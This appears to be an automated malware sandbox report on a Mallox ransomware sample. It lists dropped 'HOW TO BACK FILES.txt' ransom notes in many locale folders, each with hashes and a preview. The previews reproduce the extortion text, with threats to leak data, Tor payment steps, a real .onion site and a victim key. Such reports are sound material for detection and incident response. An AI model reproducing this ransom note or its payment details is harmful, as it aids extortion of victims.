                    C:\Users\user\AppData\Local\Microsoft\input\ar-KW\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-LB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-LY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-MA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-OM\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-QA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-SA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-SY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-TN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ar-YE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\az-Latn-AZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\bg-BG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\bn-BD\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\ca-ES\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\cs-CZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\da-DK\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\de-AT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\de-CH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\de-DE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
